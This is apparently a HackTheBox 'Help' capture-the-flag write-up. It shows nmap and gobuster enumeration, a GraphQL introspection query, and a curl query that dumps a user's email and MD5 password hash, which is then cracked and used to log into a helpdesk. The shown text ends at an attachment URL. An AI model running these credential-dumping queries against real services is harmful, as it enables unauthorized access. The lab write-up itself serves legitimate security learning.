Help - wook413

#hackthebox #easy #linux # Information Gathering - Nmap I started the box with scanning all TCP ports and discovered 3 open ports: 22, 80, and 3000 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -Pn -n --open $IP --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:50 UTC Nmap scan report for 10.10.10.121 Host is up (0.050s latency). Not shown: 65529 closed tcp ports (reset), 3 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds ``` Then I performed another TCP scan but only against the open ports found. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80,3000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:51 UTC Nmap scan report for 10.10.10.121 Host is up (0.051s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 |_http-title: Did not follow redirect to http://help.htb/ |_http-server-header: Apache/2.4.18 (Ubuntu) 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.17 seconds ``` Finally, a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:52 UTC Nmap scan report for 10.10.10.121 Host is up (0.051s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp open|filtered netbios-dgm 161/udp closed snmp 445/udp open|filtered microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds ``` --- # Enumeration ##### HTTP - TCP 80 Let's first add `help.htb` to `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "10.10.10.121 help.htb" | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.10.121 help.htb ``` The landing page on port 80 is just an Apache2 Ubuntu Default page. ![[Pasted image 20250807205614.png]] ##### HTTP - TCP 3000 The page on port 3000 returns a response in JSON format, which indicates that it is not a typical HTML website but rather an API endpoint or part of a web application. ![[Pasted image 20250807205733.png]] I ran gobuster to enumerate directories and because we are dealing with an endpoint, I used `api-endpoints.txt` wordlist. I found `graphql` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://help.htb:3000/ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://help.htb:3000/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /graphql (Status: 400) [Size: 18] Progress: 269 / 270 (99.63%) =============================================================== Finished =============================================================== ``` I learned that if appropriate security settings are not configured, we can dump all the schema and the fields information by using introspection query. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ curl -X POST http://help.htb:3000/graphql \ > -H "Content-Type: application/json" \ > -d '{"query": "{ __schema { types { name fields { name } } } }" }' {"data":{"__schema":{"types":[{"name":"Query","fields":[{"name":"user"}]},{"name":"User","fields":[{"name":"username"},{"name":"password"}]},{"name":"String","fields":null},{"name":"__Schema","fields":[{"name":"types"},{"name":"queryType"},{"name":"mutationType"},{"name":"subscriptionType"},{"name":"directives"}]},{"name":"__Type","fields":[{"name":"kind"},{"name":"name"},{"name":"description"},{"name":"fields"},{"name":"interfaces"},{"name":"possibleTypes"},{"name":"enumValues"},{"name":"inputFields"},{"name":"ofType"}]},{"name":"__TypeKind","fields":null},{"name":"Boolean","fields":null},{"name":"__Field","fields":[{"name":"name"},{"name":"description"},{"name":"args"},{"name":"type"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__InputValue","fields":[{"name":"name"},{"name":"description"},{"name":"type"},{"name":"defaultValue"}]},{"name":"__EnumValue","fields":[{"name":"name"},{"name":"description"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__Directive","fields":[{"name":"name"},{"name":"description"},{"name":"locations"},{"name":"args"}]},{"name":"__DirectiveLocation","fields":null}]}}} ``` The output above looks ugly, so I appended `| jq .` to prettify it. ![[Pasted image 20250807221155.png]] Now we found `user` field exists and we know `username` and `password` are inside the field using the introspection query, I attempted to dump all of the users information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ curl -s -X POST http://help.htb:3000/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ user { username password } } "}' | jq . { "data": { "user": { "username": "[email protected]", "password": "5d3c93182bb20f07b994a7f617e99cff" } } } ``` I found a username and password. The password is not in plaintext but hashed. I used `crackstation.net` to crack it because by the look of hash I felt like it could be cracked just fine by only using crackstation. So the valid set of credentials is `[email protected]:godhelpmeplz` ![[Pasted image 20250807221719.png]] Successfully logged in! ![[Pasted image 20250807222114.png]] ![[Pasted image 20250807222230.png]] ![[Pasted image 20250807222604.png]] The final destination of my attachment is as follows: `http://help.htb/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6`